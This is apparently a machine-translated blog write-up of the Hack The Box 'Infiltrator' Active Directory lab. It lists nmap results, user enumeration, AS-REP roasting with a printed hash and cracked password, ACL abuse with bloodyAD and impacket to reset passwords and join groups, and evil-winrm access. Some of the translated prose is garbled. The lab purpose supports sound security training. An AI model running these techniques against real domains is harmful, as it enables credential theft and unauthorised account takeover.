Location>code7788 >text

HTB Target Shooting Records - Infiltrator

Popularity:961 ℃/2024-10-22 17:56:01

nmap scan

nmap -A 10.10.11.31

Starting Nmap 7.94SVN (  ) at 2024-10-15 13:18 CST
Nmap scan report for  (10.10.11.31)
Host is up (0.46s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Microsoft IIS httpd 10.0
|_http-title: 
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-10-15 05:18:56Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-10-15T05:21:33+00:00; -6s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-15T05:21:30+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-15T05:21:31+00:00; -4s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp open  globalcatLDAPssl?
|_ssl-date: 2024-10-15T05:21:30+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
|_ssl-date: 2024-10-15T05:21:30+00:00; -4s from scanner time.
| ssl-cert: Subject: commonName=
| Not valid before: 2024-07-30T13:20:17
|_Not valid after:  2025-01-29T13:20:17
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (85%)
Aggressive OS guesses: Microsoft Windows Server 2019 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -3s, deviation: 2s, median: -4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-15T05:20:57
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   624.86 ms 10.10.16.1
2   624.97 ms  (10.10.11.31)

OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.82 seconds

Domain control.

Web Collection

Check the port 80 web service, you can see that there is a team introduction, collect the names of team members, xpath f12 to locate the following

curl -s / | xmllint --html --xpath "//div/div/h4" -

<h4>.01 David Anderson</h4>
<h4>.02 Olivia Martinez</h4>
<h4>.03 Kevin Turner</h4>
<h4>.04 Amanda Walker</h4>
<h4>.05 Marcus Harris</h4>
<h4>.06 Lauren Clark</h4>
<h4>.07 Ethan Rodriguez</h4>

David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez

kerbrute enumeration domain users

Organize the usernames collected above into a domain user format

david_anderson@
@
d_anderson@
@
olivia_martinez@
@
o_martinez@
@
kevin_turner@
@
k_turner@
@
amanda_walker@
@
a_walker@
@
marcus_harris@
@
m_harris@
@
lauren_clark@
@
l_clark@
@
ethan_rodriguez@
@
e_rodriguez@
@

kerbrute userenum --dc -d

AS-REP Roasting

impacket-GetNPUsers / -usersfile -outputfile -no-pass

$krb5asrep$23$@@:a1d4f31dcf6bc05a04dee51be421e533$0aa08870f1211e00c6db740e862bce466a86986da0fe451e8136c2ed02dc0749a729f85566ebc762e2f65ac62348f6c246dd22f1383a8b5b9ba0af2357252dd04f0359761f11ffcf00ad31f78e100df2e00b771ca041e156aac6400ad50849c55e21ca5e23f04336228446714cdbf54b8e0aee48749cf472d8cbcf06a752990077edfd9361c85d9c28bbd072379b66d6bddafa1f751c8f9ee6644a99fd89c7bb7900f66f7d83d3180fb04e91f3471a512987c18400b122251160730106144d1a18e91a1243f5b2c2ff50a2baa10dda423781df8a4301c723858c6d8d580591f3d2a70295a18298d1b519498e27db17544733

Hash brute

hashcat

Detected 18200, direct rockyou blast.

hashcat -a 0 -m 18200 /usr/share/wordlists/

BREAK OUT PASSWORD.WAT?watismypass!

Get the credentials.:WAT?watismypass!

password reuse

Running smb, wmi can't connect to it, that means this user is not very useful, see if there are other users to reuse this password.







crackmapexec smb 10.10.11.35 -u -p 'WAT?watismypass!'

Get the credentials.:WAT?watismypass!

It also fails to connect, (x

Bloodhound collection

Try to see if you can collect domain information

bloodhound-python -d -u -p 'WAT?watismypass!' -c all --dns-tcp --zip --dns-timeout 10

Imported into bloodhound. Nothing useful.

bloodhound-python -d -u -p 'WAT?watismypass!' -c all --dns-tcp --zip --dns-timeout 10

Import bloodhound with GenericAll permission for MARKETING DIGITAL@.be part ofMARKETING DIGITALgroup, so we can modify thepasswords

GenericAll

first modifytreat (sb a certain way)MARKETING DIGITALThe control permissions for the group areFullControlGet it first.notes

impacket-getTGT '/:WAT?watismypass!' -dc-ip 10.10.11.31

Then import the ticket:export KRB5CCNAME=

Modify Privileges.python3 AD/impacket/examples/ -action 'write' -rights 'FullControl' -inheritance -principal '' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' '/' -k -no-pass -dc-ip 10.10.11.31

change your password

python3 --host "" -d "" --kerberos --dc-ip 10.10.11.31 -u "" -p "WAT?watismypass\!" set password "" "K@night666"

Viewing the user's information reveals that there is no limit to the number ofCHIEFS MARKETINGclusterAddSelfscope of one's jurisdiction

particle marking the following noun as a direct objectUser JoinsCHIEFS MARKETINGorganize

python3 AD/bloodyAD/ --host "" -d "" --dc-ip 10.10.11.31 -u -p "K@night666" -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB"

ferret outCHIEFS MARKETINGgroup permissions, it was found that it is possible to force changes to theUser's password

utilizationThe user modifies theUser's password

python3 AD/bloodyAD/ --host "" -d "" --kerberos --dc-ip 10.10.11.31 -u "" -p "K@night666" set password "" "K@night666"

evil-winrm

utilizationThe user evil-winrm connected to get the

raise the right to speak

A compressed package, which mysql root user password, directly read the Administrator user's (public environment is too difficult, not demonstrated here)